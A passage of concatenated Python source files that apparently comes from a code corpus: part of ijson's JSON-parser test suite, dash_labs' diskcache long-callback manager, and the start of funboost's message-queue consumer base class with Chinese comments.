b'nul',
b't',
b'tr',
b'tru',
b'f',
b'fa',
b'fal',
b'fals',
b'[f',
b'[fa',
b'[fal',
b'[fals',
b'[t',
b'[tr',
b'[tru',
b'[n',
b'[nu',
b'[nul',
b'{"key": t',
b'{"key": tr',
b'{"key": tru',
b'{"key": f',
b'{"key": fa',
b'{"key": fal',
b'{"key": fals',
b'{"key": n',
b'{"key": nu',
b'{"key": nul',
]
STRINGS_JSON = br'''
{
"str1": "",
"str2": "\"",
"str3": "\\",
"str4": "\\\\",
"special\t": "\b\f\n\r\t"
}
'''
SURROGATE_PAIRS_JSON = br'"\uD83D\uDCA9"'
PARTIAL_ARRAY_JSONS = [
(b'[1,', 1),
(b'[1, 2 ', 1, 2),
(b'[1, "abc"', 1, 'abc'),
(b'[{"abc": [0, 1]}', {'abc': [0, 1]}),
(b'[{"abc": [0, 1]},', {'abc': [0, 1]}),
]
items_test_case = collections.namedtuple('items_test_case', 'json, prefix, kvitems, items')
EMPTY_MEMBER_TEST_CASES = {
'simple': items_test_case(
b'{"a": {"": {"b": 1, "c": 2}}}',
'a.',
[("b", 1), ("c", 2)],
[{"b": 1, "c": 2}]
),
'embedded': items_test_case(
b'{"a": {"": {"": {"b": 1, "c": 2}}}}',
'a..',
[("b", 1), ("c", 2)],
[{"b": 1, "c": 2}]
),
'top_level': items_test_case(
b'{"": 1, "a": 2}',
'',
[("", 1), ("a", 2)],
[{"": 1, "a": 2}]
),
'top_level_embedded': items_test_case(
b'{"": {"": 1}, "a": 2}',
'',
[("", {"": 1}), ("a", 2)],
[{"": {"": 1}, "a": 2}]
)
}
class warning_catcher(object):
'''Encapsulates proper warning catch-all logic in python 2.7 and 3'''
def __init__(self):
self.catcher = warnings.catch_warnings(record=True)
def __enter__(self):
ret = self.catcher.__enter__()
if compat.IS_PY2:
warnings.simplefilter("always")
return ret
def __exit__(self, *args):
self.catcher.__exit__(*args)
class BackendSpecificTestCase(object):
'''
Base class for backend-specific tests, gives ability to easily and
generically reference different methods on the backend. It requires
subclasses to define a `backend` member with the backend module, and a
`suffix` attribute indicating the method flavour to obtain.
'''
def __getattr__(self, name):
return getattr(self.backend, name + self.method_suffix)
class IJsonTestsBase(object):
'''
Base class with common tests for all iteration methods.
Subclasses implement `all()` and `first()` to collect events coming from
a particuliar method.
'''
def test_basic_parse(self):
events = self.get_all(self.basic_parse, JSON)
self.assertEqual(events, JSON_EVENTS)
def test_basic_parse_threaded(self):
thread = threading.Thread(target=self.test_basic_parse)
thread.start()
thread.join()
def test_parse(self):
events = self.get_all(self.parse, JSON)
self.assertEqual(events, JSON_PARSE_EVENTS)
def test_items(self):
events = self.get_all(self.items, JSON, '')
self.assertEqual(events, [JSON_OBJECT])
def test_items_twodictlevels(self):
json = b'{"meta":{"view":{"columns":[{"id": -1}, {"id": -2}]}}}'
ids = self.get_all(self.items, json, 'meta.view.columns.item.id')
self.assertEqual(2, len(ids))
self.assertListEqual([-2,-1], sorted(ids))
def test_items_with_dotted_name(self):
json = b'{"0.1": 0}'
self.assertListEqual([0], self.get_all(self.items, json, '0.1'))
json = b'{"0.1": [{"a.b": 0}]}'
self.assertListEqual([0], self.get_all(self.items, json, '0.1.item.a.b'))
json = b'{"0.1": 0, "0": {"1": 1}}'
self.assertListEqual([0, 1], self.get_all(self.items, json, '0.1'))
json = b'{"abc.def": 0}'
self.assertListEqual([0], self.get_all(self.items, json, 'abc.def'))
self.assertListEqual([], self.get_all(self.items, json, 'abc'))
self.assertListEqual([], self.get_all(self.items, json, 'def'))
def test_map_type(self):
obj = self.get_first(self.items, JSON, '')
self.assertTrue(isinstance(obj, dict))
obj = self.get_first(self.items, JSON, '', map_type=collections.OrderedDict)
self.assertTrue(isinstance(obj, collections.OrderedDict))
def test_kvitems(self):
kvitems = self.get_all(self.kvitems, JSON, 'docs.item')
self.assertEqual(JSON_KVITEMS, kvitems)
def test_kvitems_toplevel(self):
kvitems = self.get_all(self.kvitems, JSON, '')
self.assertEqual(1, len(kvitems))
key, value = kvitems[0]
self.assertEqual('docs', key)
self.assertEqual(JSON_OBJECT['docs'], value)
def test_kvitems_empty(self):
kvitems = self.get_all(self.kvitems, JSON, 'docs')
self.assertEqual([], kvitems)
def test_kvitems_twodictlevels(self):
json = b'{"meta":{"view":{"columns":[{"id": -1}, {"id": -2}]}}}'
view = self.get_all(self.kvitems, json, 'meta.view')
self.assertEqual(1, len(view))
key, value = view[0]
self.assertEqual('columns', key)
self.assertEqual([{'id': -1}, {'id': -2}], value)
def test_kvitems_different_underlying_types(self):
kvitems = self.get_all(self.kvitems, JSON, 'docs.item.meta')
self.assertEqual(JSON_KVITEMS_META, kvitems)
def test_basic_parse_array(self):
events = self.get_all(self.basic_parse, ARRAY_JSON)
self.assertEqual(events, ARRAY_JSON_EVENTS)
def test_basic_parse_array_threaded(self):
thread = threading.Thread(target=self.test_basic_parse_array)
thread.start()
thread.join()
def test_parse_array(self):
events = self.get_all(self.parse, ARRAY_JSON)
self.assertEqual(events, ARRAY_JSON_PARSE_EVENTS)
def test_items_array(self):
events = self.get_all(self.items, ARRAY_JSON, '')
self.assertEqual(events, [ARRAY_JSON_OBJECT])
def test_kvitems_array(self):
kvitems = self.get_all(self.kvitems, ARRAY_JSON, 'item.docs.item')
self.assertEqual(JSON_KVITEMS, kvitems)
def test_scalar(self):
events = self.get_all(self.basic_parse, SCALAR_JSON)
self.assertEqual(events, [('number', 0)])
def test_strings(self):
events = self.get_all(self.basic_parse, STRINGS_JSON)
strings = [value for event, value in events if event == 'string']
self.assertEqual(strings, ['', '"', '\\', '\\\\', '\b\f\n\r\t'])
self.assertTrue(('map_key', 'special\t') in events)
def test_surrogate_pairs(self):
event = self.get_first(self.basic_parse, SURROGATE_PAIRS_JSON)
parsed_string = event[1]
self.assertEqual(parsed_string, '💩')
def test_numbers(self):
"""Check that numbers are correctly parsed"""
def get_numbers(json, **kwargs):
events = self.get_all(self.basic_parse, json, **kwargs)
return events, [value for event, value in events if event == 'number']
def assert_numbers(json, expected_float_type, *numbers, **kwargs):
events, values = get_numbers(json, **kwargs)
float_types = set(type(value) for event, value in events if event == 'number')
float_types -= {int}
self.assertEqual(1, len(float_types))
self.assertEqual(next(iter(float_types)), expected_float_type)
self.assertSequenceEqual(numbers, values)
NUMBERS_JSON = b'[1, 1.0, 1E2]'
assert_numbers(NUMBERS_JSON, Decimal, 1, Decimal("1.0"), Decimal("1e2"))
assert_numbers(NUMBERS_JSON, float, 1, 1., 100., use_float=True)
assert_numbers(b'1e400', Decimal, Decimal('1e400'))
assert_numbers(b'1e-400', Decimal, Decimal('1e-400'))
assert_numbers(b'1e-400', float, 0., use_float=True)
# Test for 64-bit integers support when using use_float=True
try:
past32bits = 2 ** 32 + 1
received = get_numbers(('%d' % past32bits).encode('utf8'), use_float=True)[1][0]
self.assertTrue(self.supports_64bit_integers)
self.assertEqual(past32bits, received)
except common.JSONError:
self.assertFalse(self.supports_64bit_integers)
# Check that numbers bigger than MAX_DOUBLE cannot be represented
try:
get_numbers(b'1e400', use_float=True)
self.fail("Overflow error expected")
except common.JSONError:
pass
def test_invalid_numbers(self):
# leading zeros
if self.detects_leading_zeros:
for case in (b'00', b'01', b'001'):
for base in (case, case + b'.0', case + b'e0', case + b'E0'):
for n in (base, b'-' + base):
with self.assertRaises(common.JSONError):
self.get_all(self.basic_parse, n)
# incomplete exponents
for n in (b'1e', b'0.1e', b'0E'):
with self.assertRaises(common.JSONError):
self.get_all(self.basic_parse, n)
# incomplete fractions
for n in (b'1.', b'.1'):
with self.assertRaises(common.JSONError):
self.get_all(self.basic_parse, n)
def test_incomplete(self):
for json in INCOMPLETE_JSONS:
with self.assertRaises(common.IncompleteJSONError):
self.get_all(self.basic_parse, json)
def test_incomplete_tokens(self):
if not self.handles_incomplete_json_tokens:
return
for json in INCOMPLETE_JSON_TOKENS:
with self.assertRaises(common.IncompleteJSONError):
self.get_all(self.basic_parse, json)
def test_invalid(self):
for json in INVALID_JSONS:
# Yajl1 doesn't complain about additional data after the end
# of a parsed object. Skipping this test.
if self.backend_name == 'yajl' and json == YAJL1_PASSING_INVALID:
continue
with self.assertRaises(common.JSONError):
self.get_all(self.basic_parse, json)
def test_multiple_values(self):
"""Test that the multiple_values flag works"""
if not self.supports_multiple_values:
with self.assertRaises(ValueError):
self.get_all(self.basic_parse, "", multiple_values=True)
return
multiple_json = JSON + JSON + JSON
items = lambda x, **kwargs: self.items(x, '', **kwargs)
for func in (self.basic_parse, items):
with self.assertRaises(common.JSONError):
self.get_all(func, multiple_json)
with self.assertRaises(common.JSONError):
self.get_all(func, multiple_json, multiple_values=False)
result = self.get_all(func, multiple_json, multiple_values=True)
if func == items:
self.assertEqual(result, [JSON_OBJECT, JSON_OBJECT, JSON_OBJECT])
else:
self.assertEqual(result, JSON_EVENTS + JSON_EVENTS + JSON_EVENTS)
def test_comments(self):
json = b'{"a": 2 /* a comment */}'
try:
self.get_all(self.basic_parse, json, allow_comments=True)
except ValueError:
if self.supports_comments:
raise
def _test_empty_member(self, test_case):
pairs = self.get_all(self.kvitems, test_case.json, test_case.prefix)
self.assertEqual(test_case.kvitems, pairs)
objects = self.get_all(self.items, test_case.json, test_case.prefix)
self.assertEqual(test_case.items, objects)
def test_empty_member(self):
self._test_empty_member(EMPTY_MEMBER_TEST_CASES['simple'])
def test_embedded_empty_member(self):
self._test_empty_member(EMPTY_MEMBER_TEST_CASES['embedded'])
def test_top_level_empty_member(self):
self._test_empty_member(EMPTY_MEMBER_TEST_CASES['top_level'])
def test_top_level_embedded_empty_member(self):
self._test_empty_member(EMPTY_MEMBER_TEST_CASES['top_level_embedded'])
class FileBasedTests(object):
def test_string_stream(self):
with warning_catcher() as warns:
events = self.get_all(self.basic_parse, b2s(JSON))
self.assertEqual(events, JSON_EVENTS)
if self.warn_on_string_stream:
self.assertEqual(len(warns), 1)
self.assertEqual(DeprecationWarning, warns[0].category)
def test_different_buf_sizes(self):
for buf_size in (1, 4, 16, 64, 256, 1024, 4098):
events = self.get_all(self.basic_parse, JSON, buf_size=buf_size)
self.assertEqual(events, JSON_EVENTS)
def generate_backend_specific_tests(module, classname_prefix, method_suffix,
*bases, **kwargs):
for backend in ['python', 'yajl', 'yajl2', 'yajl2_cffi', 'yajl2_c']:
try:
classname = '%s%sTests' % (
''.join(p.capitalize() for p in backend.split('_')),
classname_prefix
)
if IS_PY2:
classname = classname.encode('ascii')
_bases = bases + (BackendSpecificTestCase, unittest.TestCase)
_members = {
'backend_name': backend,
'backend': ijson.get_backend(backend),
'method_suffix': method_suffix,
'warn_on_string_stream': not IS_PY2,
'supports_64bit_integers': not (backend == 'yajl' and ctypes.sizeof(ctypes.c_long) == 4)
}
members = kwargs.get('members', lambda _: {})
_members.update(members(backend))
module[classname] = type(classname, _bases, _members)
except ImportError:
pass
def generate_test_cases(module, classname, method_suffix, *bases):
_bases = bases + (IJsonTestsBase,)
members = lambda name: {
'get_all': lambda self, *args, **kwargs: module['get_all'](*args, **kwargs),
'get_first': lambda self, *args, **kwargs: module['get_first'](*args, **kwargs),
'supports_multiple_values': name != 'yajl',
'supports_comments': name != 'python',
'detects_leading_zeros': name != 'yajl',
'handles_incomplete_json_tokens': name != 'yajl'
}
return generate_backend_specific_tests(module, classname, method_suffix,
members=members, *_bases)
|
diskcache_manager.py
|
import platform
from dash_labs.plugins.long_callback.managers import BaseLongCallbackManager
class DiskcacheCachingCallbackManager(BaseLongCallbackManager):
def __init__(self, cache, cache_by=None, expire=None):
import diskcache
if not isinstance(cache, diskcache.Cache):
raise ValueError("First argument must be a diskcache.Cache object")
super().__init__(cache_by)
# Handle process class import
if platform.system() == "Windows":
try:
from multiprocess import Process
except ImportError:
raise ImportError(
"""\
When running on Windows, the long_callback decorator requires the
multiprocess package which can be install using pip...
$ pip install multiprocess
or conda.
$ conda install -c conda-forge multiprocess\n"""
)
else:
from multiprocessing import Process
self.Process = Process
self.cache = cache
self.callback_futures = dict()
self.expire = expire
def init(self, app):
pass
def delete_future(self, key):
if key in self.callback_futures:
future = self.callback_futures.pop(key, None)
if future:
future.kill()
future.join()
return True
return False
def clear_cache_entry(self, key):
self.cache.delete(key)
def terminate_unhealthy_future(self, key):
return False
def has_future(self, key):
return self.callback_futures.get(key, None) is not None
def get_future(self, key, default=None):
return self.callback_futures.get(key, default)
def make_background_fn(self, fn, progress=False):
return make_update_cache(fn, self.cache, progress, self.expire)
@staticmethod
def _make_progress_key(key):
return key + "-progress"
def call_and_register_background_fn(self, key, background_fn, args):
self.delete_future(key)
future = self.Process(
target=background_fn, args=(key, self._make_progress_key(key), args)
)
future.start()
self.callback_futures[key] = future
def get_progress(self, key):
future = self.get_future(key)
if future is not None:
progress_key = self._make_progress_key(key)
return self.cache.get(progress_key)
return None
def result_ready(self, key):
return self.cache.get(key) not in (None, "__undefined__")
def get_result(self, key):
# Get result value
result = self.cache.get(key)
if result == "__undefined__":
result = None
# Clear result if not caching
if self.cache_by is None and result is not None:
self.clear_cache_entry(key)
# Always delete_future (even if we didn't clear cache) so that we can
# handle the case where cache entry is cleared externally.
self.delete_future(key)
return result
def make_update_cache(fn, cache, progress, expire):
def _callback(result_key, progress_key, user_callback_args):
def _set_progress(progress_value):
cache.set(progress_key, progress_value)
maybe_progress = [_set_progress] if progress else []
if isinstance(user_callback_args, dict):
user_callback_output = fn(*maybe_progress, **user_callback_args)
elif isinstance(user_callback_args, list):
user_callback_output = fn(*maybe_progress, *user_callback_args)
else:
user_callback_output = fn(*maybe_progress, user_callback_args)
cache.set(result_key, user_callback_output, expire=expire)
return _callback
|
base_consumer.py
|
# -*- coding: utf-8 -*-
# @Author : ydf
# @Time : 2019/8/8 0008 13:11
"""
所有中间件类型消费者的抽象基类。使实现不同中间件的消费者尽可能代码少。
整个流程最难的都在这里面。因为要实现多种并发模型,和对函数施加20运行种控制方式,所以代码非常长。
"""
import typing
import abc
import copy
from pathlib import Path
# from multiprocessing import Process
import datetime
# noinspection PyUnresolvedReferences,PyPackageRequirements
import pytz
import json
import logging
import sys
import atexit
import socket
import os
import uuid
import time
import traceback
# from collections import Callable
from typing import Callable
from functools import wraps
import threading
from threading import Lock, Thread
import eventlet
import gevent
import asyncio
from apscheduler.schedulers.background import BackgroundScheduler
from apscheduler.executors.pool import ThreadPoolExecutor as ApschedulerThreadPoolExecutor
from apscheduler.events import EVENT_JOB_MISSED
from funboost.concurrent_pool.single_thread_executor import SoloExecutor
from funboost.helpers import FunctionResultStatusPersistanceConfig
from funboost.utils.apscheduler_monkey import patch_run_job as patch_apscheduler_run_job
import pymongo
from pymongo import IndexModel
from pymongo.errors import PyMongoError
# noinspection PyUnresolvedReferences
from nb_log import get_logger, LoggerLevelSetterMixin, LogManager, nb_print, LoggerMixin, \
LoggerMixinDefaultWithFileHandler, stdout_write, stderr_write, is_main_process, \
only_print_on_main_process, nb_log_config_default
# noinspection PyUnresolvedReferences
from funboost.concurrent_pool.async_helper import simple_run_in_executor
from funboost.concurrent_pool.async_pool_executor import AsyncPoolExecutor
# noinspection PyUnresolvedReferences
from funboost.concurrent_pool.bounded_threadpoolexcutor import \
BoundedThreadPoolExecutor
from funboost.concurrent_pool.custom_evenlet_pool_executor import evenlet_timeout_deco, \
check_evenlet_monkey_patch, CustomEventletPoolExecutor
from funboost.concurrent_pool.custom_gevent_pool_executor import gevent_timeout_deco, \
GeventPoolExecutor, check_gevent_monkey_patch
from funboost.concurrent_pool.custom_threadpool_executor import \
CustomThreadPoolExecutor, check_not_monkey
# from funboost.concurrent_pool.concurrent_pool_with_multi_process import ConcurrentPoolWithProcess
from funboost.consumers.redis_filter import RedisFilter, RedisImpermanencyFilter
from funboost.factories.publisher_factotry import get_publisher
from funboost.utils import decorators, time_util, RedisMixin, un_strict_json_dumps
# noinspection PyUnresolvedReferences
from funboost.utils.bulk_operation import MongoBulkWriteHelper, InsertOne
from funboost.utils.mongo_util import MongoMixin
from funboost import funboost_config_deafult
# noinspection PyUnresolvedReferences
from funboost.constant import ConcurrentModeEnum, BrokerEnum
patch_apscheduler_run_job()
def _delete_keys_and_return_new_dict(dictx: dict, keys: list = None):
dict_new = copy.copy(dictx) # 主要是去掉一级键 publish_time,浅拷贝即可。
keys = ['publish_time', 'publish_time_format', 'extra'] if keys is None else keys
for dict_key in keys:
try:
dict_new.pop(dict_key)
except KeyError:
pass
return dict_new
class ExceptionForRetry(Exception):
"""为了重试的,抛出错误。只是定义了一个子类,用不用都可以,函数出任何类型错误了框架都会自动重试"""
class ExceptionForRequeue(Exception):
"""框架检测到此错误,重新放回队列中"""
def _get_publish_time(paramsx: dict):
"""
原来存放控制参数的位置没想好,建议所有控制参数放到extra键的字典值里面。
:param paramsx:
:return:
"""
return paramsx.get('extra', {}).get('publish_time', None) or paramsx.get('publish_time', None)
class FunctionResultStatus(LoggerMixin, LoggerLevelSetterMixin):
host_name = socket.gethostname()
host_process = f'{host_name} - {os.getpid()}'
script_name_long = sys.argv[0]
script_name = script_name_long.split('/')[-1].split('\\')[-1]
def __init__(self, queue_name: str, fucntion_name: str, msg_dict: dict):
# print(params)
self.queue_name = queue_name
self.function = fucntion_name
self.msg_dict = msg_dict
self.task_id = self.msg_dict.get('extra', {}).get('task_id', '')
self.process_id = os.getpid()
self.thread_id = threading.get_ident()
self.publish_time = publish_time = _get_publish_time(msg_dict)
if publish_time:
self.publish_time_str = time_util.DatetimeConverter(publish_time).datetime_str
function_params = _delete_keys_and_return_new_dict(msg_dict, )
self.params = function_params
self.params_str = json.dumps(function_params, ensure_ascii=False)
self.result = None
self.run_times = 0
self.exception = None
self.time_start = time.time()
self.time_cost = None
self.time_end = None
self.success = False
self.total_thread = threading.active_count()
self.has_requeue = False
self.set_log_level(20)
def get_status_dict(self, without_datetime_obj=False):
self.time_end = time.time()
self.time_cost = round(self.time_end - self.time_start, 3)
item = self.__dict__
item['host_name'] = self.host_name
item['host_process'] = self.host_process
item['script_name'] = self.script_name
item['script_name_long'] = self.script_name_long
# item.pop('time_start')
datetime_str = time_util.DatetimeConverter().datetime_str
try:
json.dumps(item['result']) # 不希望存不可json序列化的复杂类型。麻烦。存这种类型的结果是伪需求。
except TypeError:
item['result'] = str(item['result'])[:1000]
item.update({'insert_time_str': datetime_str,
'insert_minutes': datetime_str[:-3],
})
if not without_datetime_obj:
item.update({'insert_time': datetime.datetime.now(),
'utime': datetime.datetime.utcnow(),
})
else:
item = _delete_keys_and_return_new_dict(item, ['insert_time', 'utime'])
# kw['body']['extra']['task_id']
# item['_id'] = self.task_id.split(':')[-1] or str(uuid.uuid4())
item['_id'] = self.task_id or str(uuid.uuid4())
# self.logger.warning(item['_id'])
# self.logger.warning(item)
return item
class ResultPersistenceHelper(MongoMixin, LoggerMixin):
def __init__(self, function_result_status_persistance_conf: FunctionResultStatusPersistanceConfig, queue_name):
self.function_result_status_persistance_conf = function_result_status_persistance_conf
self._bulk_list = []
self._bulk_list_lock = Lock()
self._last_bulk_insert_time = 0
if self.function_result_status_persistance_conf.is_save_status:
task_status_col = self.mongo_db_task_status.get_collection(queue_name)
try:
# params_str 如果很长,必须使用TEXt或HASHED索引。
task_status_col.create_indexes([IndexModel([("insert_time_str", -1)]), IndexModel([("insert_time", -1)]),
IndexModel([("params_str", pymongo.TEXT)]), IndexModel([("success", 1)])
], )
task_status_col.create_index([("utime", 1)],
expireAfterSeconds=function_result_status_persistance_conf.expire_seconds) # 只保留7天(用户自定义的)。
except pymongo.errors.OperationFailure as e: # 新的mongo服务端,每次启动重复创建已存在索引会报错,try一下。
self.logger.warning(e)
# self._mongo_bulk_write_helper = MongoBulkWriteHelper(task_status_col, 100, 2)
self.task_status_col = task_status_col
self.logger.info(f"函数运行状态结果将保存至mongo的 task_status 库的 {queue_name} 集合中,请确认 funboost.py文件中配置的 MONGO_CONNECT_URL")
def save_function_result_to_mongo(self, function_result_status: FunctionResultStatus):
if self.function_result_status_persistance_conf.is_save_status:
item = function_result_status.get_status_dict()
item2 = copy.copy(item)
if not self.function_result_status_persistance_conf.is_save_result:
item2['result'] = '不保存结果'
if item2['result'] is None:
item2['result'] = ''
if item2['exception'] is None:
item2['exception'] = ''
if self.function_result_status_persistance_conf.is_use_bulk_insert:
# self._mongo_bulk_write_helper.add_task(InsertOne(item2)) # 自动离散批量聚合方式。
with self._bulk_list_lock:
self._bulk_list.append(InsertOne(item2))
if time.time() - self._last_bulk_insert_time > 0.5:
self.task_status_col.bulk_write(self._bulk_list, ordered=False)
self._bulk_list.clear()
self._last_bulk_insert_time = time.time()
else:
self.task_status_col.insert_one(item2) # 立即实时插入。
class ConsumersManager:
schedulal_thread_to_be_join = []
consumers_queue__info_map = dict()
consumers_queue__consumer_obj_map = dict()
global_concurrent_mode = None
schedual_task_always_use_thread = False
_has_show_conusmers_info = False
@classmethod
def join_all_consumer_shedual_task_thread(cls):
"""实现这个主要是为了兼容linux和win,在开启多进程时候兼容。在linux下如果子进程中即使有在一个非守护线程里面运行while 1的逻辑,代码也会很快结束。所以必须把所有循环拉取消息的线程join
否则如果只是为了兼容win,压根不需要这里多此一举
"""
# nb_print((cls.schedulal_thread_to_be_join, len(cls.schedulal_thread_to_be_join), '模式:', cls.global_concurrent_mode))
if cls.schedual_task_always_use_thread:
for t in cls.schedulal_thread_to_be_join:
nb_print(t)
t.join()
else:
if cls.global_concurrent_mode in [ConcurrentModeEnum.THREADING, ConcurrentModeEnum.ASYNC, ]:
for t in cls.schedulal_thread_to_be_join:
# nb_print(t)
t.join()
elif cls.global_concurrent_mode == ConcurrentModeEnum.GEVENT:
# cls.logger.info()
# nb_print(cls.schedulal_thread_to_be_join)
gevent.joinall(cls.schedulal_thread_to_be_join, raise_error=True, )
elif cls.global_concurrent_mode == ConcurrentModeEnum.EVENTLET:
for g in cls.schedulal_thread_to_be_join:
# eventlet.greenthread.GreenThread.
# nb_print(g)
g.wait()
@classmethod
def show_all_consumer_info(cls):
# nb_print(f'当前解释器内,所有消费者的信息是:\n {cls.consumers_queue__info_map}')
# if only_print_on_main_process(f'当前解释器内,所有消费者的信息是:\n {json.dumps(cls.consumers_queue__info_map, indent=4, ensure_ascii=False)}'):
if not cls._has_show_conusmers_info:
for _, consumer_info in cls.consumers_queue__info_map.items():
stdout_write(f'{time.strftime("%H:%M:%S")} "{consumer_info["where_to_instantiate"]}" '
f' \033[0;30;44m{consumer_info["queue_name"]} 的消费者\033[0m\n')
cls._has_show_conusmers_info = True
@staticmethod
def get_concurrent_name_by_concurrent_mode(concurrent_mode):
if concurrent_mode == ConcurrentModeEnum.THREADING:
return 'thread'
elif concurrent_mode == ConcurrentModeEnum.GEVENT:
return 'gevent'
elif concurrent_mode == ConcurrentModeEnum.EVENTLET:
return 'evenlet'
elif concurrent_mode == ConcurrentModeEnum.ASYNC:
return 'async'
elif concurrent_mode == ConcurrentModeEnum.SINGLE_THREAD:
return 'single_thread'
# elif concurrent_mode == ConcurrentModeEnum.LINUX_FORK:
# return 'linux_fork'
# noinspection DuplicatedCode
class AbstractConsumer(LoggerLevelSetterMixin, metaclass=abc.ABCMeta, ):
time_interval_for_check_do_not_run_time = 60
BROKER_KIND = None
BROKER_EXCLUSIVE_CONFIG_KEYS = [] # 中间件能支持的独自的配置参数,例如kafka支持消费者组, 从最早还是最晚消费。因为支持30种中间件,
# 每种中间件的概念有所不同,用户可以从 broker_exclusive_config 中传递该种中间件特有的配置意义参数。
@property
@decorators.synchronized
def publisher_of_same_queue(self):
if not self._publisher_of_same_queue:
self._publisher_of_same_queue = get_publisher(self._queue_name, consuming_function=self.consuming_function,
broker_kind=self.BROKER_KIND, log_level_int=self._log_level,
is_add_file_handler=self._create_logger_file,broker_exclusive_config=self.broker_exclusive_config)
if self._msg_expire_senconds:
self._publisher_of_same_queue.set_is_add_publish_time()
return self._publisher_of_same_queue
def bulid_a_new_publisher_of_same_queue(self):
return get_publisher(self._queue_name, consuming_function=self.consuming_function,
broker_kind=self.BROKER_KIND, log_level_int=self._log_level,
is_add_file_handler=self._create_logger_file,broker_exclusive_config=self.broker_exclusive_config)
@classmethod
def join_shedual_task_thread(cls):
"""
:return:
"""
ConsumersManager.join_all_consumer_shedual_task_thread()
# noinspection PyProtectedMember,PyUnresolvedReferences
def __init__(self, queue_name, *, consuming_function: Callable = None,
consumin_function_decorator: typing.Callable = None, function_timeout=0, concurrent_num=50,
specify_concurrent_pool=None, specify_async_loop=None, concurrent_mode=ConcurrentModeEnum.THREADING,
max_retry_times=3, log_level=10, is_print_detail_exception=True, is_show_message_get_from_broker=False,
qps: float = 0, is_using_distributed_frequency_control=False,
msg_expire_senconds=0, is_send_consumer_hearbeat_to_redis=False,
logger_prefix='', create_logger_file=True, do_task_filtering=False,
task_filtering_expire_seconds=0,
is_do_not_run_by_specify_time_effect=False,
do_not_run_by_specify_time=('10:00:00', '22:00:00'),
schedule_tasks_on_main_thread=False,
function_result_status_persistance_conf=FunctionResultStatusPersistanceConfig(
False, False, 7 * 24 * 3600),
user_custom_record_process_info_func: typing.Callable = None,
is_using_rpc_mode=False,
broker_exclusive_config: dict = None,
):
"""
:param queue_name:
:param consuming_function: 处理消息的函数。
:param consumin_function_decorator : 函数的装饰器。因为此框架做参数自动转指点,需要获取精准的入参名称,不支持在消费函数上叠加 @ *args **kwargs的装饰器,如果想用装饰器可以这里指定。
:param function_timeout : 超时秒数,函数运行超过这个时间,则自动杀死函数。为0是不限制。
# 如果设置了qps,并且cocurrent_num是默认的50,会自动开了500并发,由于是采用的智能线程池任务少时候不会真开那么多线程而且会自动缩小线程数量。具体看ThreadPoolExecutorShrinkAble的说明
# 由于有很好用的qps控制运行频率和智能扩大缩小的线程池,此框架建议不需要理会和设置并发数量只需要关心qps就行了,框架的并发是自适应并发数量,这一点很强很好用。
:param concurrent_num:并发数量,并发种类由concurrent_mode决定
:param specify_concurrent_pool:使用指定的线程池/携程池,可以多个消费者共使用一个线程池,不为None时候。threads_num失效
:param specify_async_loop:指定的async的loop循环,设置并发模式为async才能起作用。
:param concurrent_mode:并发模式,1线程(ConcurrentModeEnum.THREADING) 2gevent(ConcurrentModeEnum.GEVENT)
3eventlet(ConcurrentModeEnum.EVENTLET) 4 asyncio(ConcurrentModeEnum.ASYNC) 5单线程(ConcurrentModeEnum.SINGLE_THREAD)
:param max_retry_times:
:param log_level: # 这里是设置消费者 发布者日志级别的,如果不想看到很多的细节显示信息,可以设置为 20 (logging.INFO)。
:param is_print_detail_exception:函数出错时候时候显示详细的错误堆栈,占用屏幕太多
:param is_show_message_get_from_broker: 从中间件取出消息时候时候打印显示出来
:param qps:指定1秒内的函数执行次数,例如可以是小数0.01代表每100秒执行一次,也可以是50代表1秒执行50次.为0则不控频。
:param is_using_distributed_frequency_control: 是否使用分布式空频(依赖redis统计消费者数量,然后频率平分),默认只对当前实例化的消费者空频有效。
假如实例化了2个qps为10的使用同一队列名的消费者,并且都启动,则每秒运行次数会达到20。如果使用分布式空频则所有消费者加起来的总运行次数是10。
:param is_send_consumer_hearbeat_to_redis 时候将发布者的心跳发送到redis,有些功能的实现需要统计活跃消费者。因为有的中间件不是真mq。
:param logger_prefix: 日志前缀,可使不同的消费者生成不同的日志
:param create_logger_file : 是否创建文件日志
:param do_task_filtering :是否执行基于函数参数的任务过滤
:param task_filtering_expire_seconds:任务过滤的失效期,为0则永久性过滤任务。例如设置过滤过期时间是1800秒 ,
30分钟前发布过1 + 2 的任务,现在仍然执行,
如果是30分钟以内发布过这个任务,则不执行1 + 2,现在把这个逻辑集成到框架,一般用于接口价格缓存。
:param is_do_not_run_by_specify_time_effect :是否使不运行的时间段生效
:param do_not_run_by_specify_time :不运行的时间段
:param schedule_tasks_on_main_thread :直接在主线程调度任务,意味着不能直接在当前主线程同时开启两个消费者。
:param function_result_status_persistance_conf :配置。是否保存函数的入参,运行结果和运行状态到mongodb。
这一步用于后续的参数追溯,任务统计和web展示,需要安装mongo。
:param user_custom_record_process_info_func 提供一个用户自定义的保存消息处理记录到某个地方例如mysql数据库的函数,函数仅仅接受一个入参,入参类型是 FunctionResultStatus,用户可以打印参数
:param is_using_rpc_mode 是否使用rpc模式,可以在发布端获取消费端的结果回调,但消耗一定性能,使用async_result.result时候会等待阻塞住当前线程。
:param broker_exclusive_config 加上一个不同种类中间件非通用的配置,不同中间件自身独有的配置,不是所有中间件都兼容的配置,因为框架支持30种消息队列,消息队列不仅仅是一般的先进先出queue这么简单的概念,
例如kafka支持消费者组,rabbitmq也支持各种独特概念例如各种ack机制 复杂路由机制,每一种消息队列都有独特的配置参数意义,可以通过这里传递。
执行流程为
1、 实例化消费者类,设置各种控制属性
2、启动 start_consuming_message 启动消费
3、start_consuming_message 中 调用 _shedual_task 从中间件循环取消息
4、 _shedual_task 中调用 _submit_task,将 任务 添加到并发池中并发运行。
5、 函数执行完成后,运行 _confirm_consume , 确认消费。
各种中间件的 取消息、确认消费 单独实现,其他逻辑由于采用了模板模式,自动复用代码。
"""
self.init_params = copy.copy(locals())
self.init_params.pop('self')
self.init_params['broker_kind'] = self.__class__.BROKER_KIND
self.init_params['consuming_function'] = consuming_function
ConsumersManager.consumers_queue__info_map[queue_name] = current_queue__info_dict = copy.copy(self.init_params)
ConsumersManager.consumers_queue__consumer_obj_map[queue_name] = self
current_queue__info_dict['consuming_function'] = str(consuming_function) # consuming_function.__name__
current_queue__info_dict['specify_async_loop'] = str(specify_async_loop)
current_queue__info_dict[
'function_result_status_persistance_conf'] = function_result_status_persistance_conf.to_dict()
current_queue__info_dict['class_name'] = self.__class__.__name__
concurrent_name = ConsumersManager.get_concurrent_name_by_concurrent_mode(concurrent_mode)
current_queue__info_dict['concurrent_mode_name'] = concurrent_name
